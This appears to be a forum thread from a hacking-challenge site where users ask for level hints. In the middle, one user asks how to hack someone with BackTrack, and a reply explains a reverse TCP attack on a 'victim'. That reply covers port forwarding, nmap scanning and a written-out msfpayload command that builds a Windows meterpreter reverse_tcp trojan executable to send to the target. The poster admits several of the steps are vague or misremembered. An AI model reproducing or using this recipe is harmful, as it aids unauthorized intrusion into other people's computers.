hamada19981998
11 years ago

0

statue is incompled

11replies
9voices
243views
guuf
11 years ago

0

hamada19981998, the first thing to do to solve these levels, is to start with the source code. Make sure to look at the Help: show hint for how to do this.

kiiiiki
11 years ago

0

how can hack someone using backtrak ?


0

Really? Really? REALLY?!?!?! do some research and there isn’t just one way. lol

Reverse TCP (Easiest Attack Ever):

Anywho, I’ll stop being an ahole now lol…. First: Know YOUR ip address and make sure that you go into your router and enable port forwarding on a port. To do that find your routers/eternal ip address by typing into google “What’s my ip” Sound pretty easy right?! :P
Use a port number that has the same as an open port on the victims computer. Do that by port scanning the victims ip address. Backtrack has nmap.
Now load into metasploit “msfconsole” and boom…. I won’t explain the process because I really don’t remember the directories to load into but when you set the port number and ipaddress it’s going to be local. So use your external ip and forwarded port that you enabled on your router.
Afterwards you open in another terminal
Do the following

./msfpayload windows/meterpreter/reverse_tcp LHOST=(((((((((((((((YOUR ETERNAL IP w/out the parentheses)))))))))))))) LPORT=(((((((((((()YOUR PORT))))))))))))) x > /root/((((((((((((((((((((((NAME OF THE VIRUS FILE))))))))))))))))))).exe

What you’re doing is basically using your building a virus using metasploit that you are going send to the victim and when they open a reverse tcp/ip attack will begin. A revers tcp attack basically is an attack from the inside using the built trojan sending Syn,Syn-Ack, and Ack tcp packets creating a successful infamous 3-way handshake. Make sense? Cool! Finally you just type in the original terminal exploit or something….. I believe start exploit but don’t quote me on it.

DO SOME RESEARCH on the very vague steps that I left out because I didn’t explain everything. There’s a million other ways to do these attacks in a more advanced and quiet even easier way but seems like the rest of the world is happy doing this via metaploit/armitage.


0

P.s. Update to Kali yo… It’s way more supported and BT isn’t updated anymore… it’s the official BT operating system.

Same OS, same tools, different name and WAY better :P

http://www.kali.org/

Cheers!


0

that way to kiiiiki by the way

daMage
11 years ago

0

@MaxLockhart I wouldn’t say it’s the same OS, since Kali is built on Debian amd BT on Ubuntu. the tools are mostly the same though as is the team behind it.

chris45
11 years ago

0

i need a help for level six

[deleted user]
11 years ago

0

chris45,

You require help with Main level 6 or Real level 6?

prabhu [prabhujegan]
11 years ago

0

i think he is asking main level 6

daMage
11 years ago

0

In any case: Wrong thread for that.

xDarkPwnAgex
11 years ago

0

In all main levels you start off by looking the source code and search for specifik words. You can search with ‘ CTRL + F ’ while looking in the sourcecode and entering your word you search in the box that will pop up. Some helpfull words are:
- User
- Username
- Pass
- Password
- …

You must be logged in to reply to this discussion. Login
1 of 12

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss